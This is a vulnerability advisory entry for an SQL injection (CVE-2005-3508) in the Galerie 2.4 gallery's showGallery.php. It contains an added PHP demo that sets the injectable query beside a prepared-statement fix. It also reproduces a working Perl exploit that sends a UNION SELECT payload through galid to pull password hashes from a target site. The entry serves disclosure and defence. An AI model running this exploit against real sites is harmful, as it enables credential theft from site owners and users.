Galerie showGallery.php SQL Injection Vulnerability

Vulnerability ID: 1109205    Vulnerability type: SQL injection
Published: 2005-11-03    Updated: 2005-11-15
CVE ID: CVE-2005-3508    CNNVD ID: CNNVD-200511-137
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/26468
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-137
|Vulnerability details
Gallery is an online image management tool. An SQL injection vulnerability in showGallery.php in Gallery (Galerie) 2.4 allows remote attackers to execute arbitrary SQL commands via the galid parameter, which is placed into a database query without validation.
|Exploit
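The root cause above is an integer identifier concatenated straight into SQL text. The following is an added example, not Galerie's own code: a reconstruction of that pattern beside a hardened version that validates the type and binds galid as a parameter. The table and column names (galleries, users, id, name, nick, passw) and the PDO/SQLite connection are assumptions chosen so the script runs stand-alone with constructed data.

```php
<?php
// Added example (not the Galerie project's code). Table/column names and the
// in-memory SQLite connection are assumptions for a self-contained demo.

// --- Vulnerable pattern: galid is interpolated into the query string. ---
// Anything the client sends becomes part of the SQL statement, so a value
// shaped like "-1 UNION SELECT ..." changes what the query returns.
function showGalleryVulnerable(PDO $pdo, string $galid): array
{
    $sql = "SELECT id, name FROM galleries WHERE id = $galid";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened: validate the expected type, then bind as a parameter. ---
// galid is a numeric key, so anything that is not a string of digits is
// rejected before any SQL is built; the bound value can never alter the
// statement's structure.
function showGallerySafe(PDO $pdo, string $galid): array
{
    if (!ctype_digit($galid)) {
        throw new InvalidArgumentException('galid must be a non-negative integer');
    }
    $stmt = $pdo->prepare('SELECT id, name FROM galleries WHERE id = :id');
    $stmt->bindValue(':id', (int) $galid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed schema and rows, kept in memory so nothing touches a real DB.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE galleries (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, nick TEXT, passw TEXT)');
$pdo->exec("INSERT INTO galleries VALUES (1, 'holiday')");
$pdo->exec("INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value')");

$benign   = '1';                                                 // normal request
$injected = '-1 UNION SELECT id, passw FROM users WHERE id=1';  // constructed malicious input

var_dump(showGalleryVulnerable($pdo, $benign));    // the gallery row
var_dump(showGalleryVulnerable($pdo, $injected));  // a users row instead: data leak
var_dump(showGallerySafe($pdo, $benign));          // the gallery row
try {
    showGallerySafe($pdo, $injected);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";   // never reaches the database
}
```

Run it with `php showgallery_demo.php`. The type check alone would already stop this particular payload, but the prepared statement is what makes the fix robust: even a parameter that legitimately has to be a string stays data rather than SQL.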
source: http://www.securityfocus.com/bid/15313/info

Galerie is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

#!/usr/bin/env perl
#------------------------------------------------------------#
#-      Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS@S4A.CC) OR (ABDUCTER_MINDS@YAHOO.COM)
#-      [!]     ==|| Gallery_v2.4 SQL Injection ||==
#-              Gr33tz :-
#-                      N0N0 (MY LOVE)
#-                      WWW.S4A.CC
#-                      Devil-00
#-                      FOR ALL ARABIAN COUNTRIES
#------------------------------------------------------------#
use strict;
use warnings;
use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for Gallery_v2.4                    ";
print "\n=   BY    |(ABDUCTER_MINDS[at]YAHOO.COM)|     ";
print "\n=             FOR ALL ARAB WWW.S4A.CC         ";
print "\n============================================\n\n";

# Two arguments: the base URL of the Galerie install and the id of the user row to read.
if(!$ARGV[0] or !$ARGV[1]) {
  print "\n==|| Warning ABDUCTER Behind U ||==";
  print "\nUsage:\nperl $0 [base url] [user id]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";
  exit(0);
}
# The galid parameter is replaced by a UNION SELECT against the users table; the
# trailing /* comments out the rest of the original query.
my $url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*";
my $page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
# The selected passw column is rendered where the gallery name normally appears.
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
|References

Source: BID
Name: 15313
Link: http://www.securityfocus.com/bid/15313
Source: BUGTRAQ
Name: 20051104 Gallery_v2.4 SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/415806/30/0/threaded
Source: VUPEN
Name: ADV-2005-2309
Link: http://www.frsirt.com/english/advisories/2005/2309
Source: OSVDB
Name: 20523
Link: http://www.osvdb.org/20523
Source: SECTRACK
Name: 1015162
Link: http://securitytracker.com/id?1015162
Source: SECUNIA
Name: 17453
Link: http://secunia.com/advisories/17453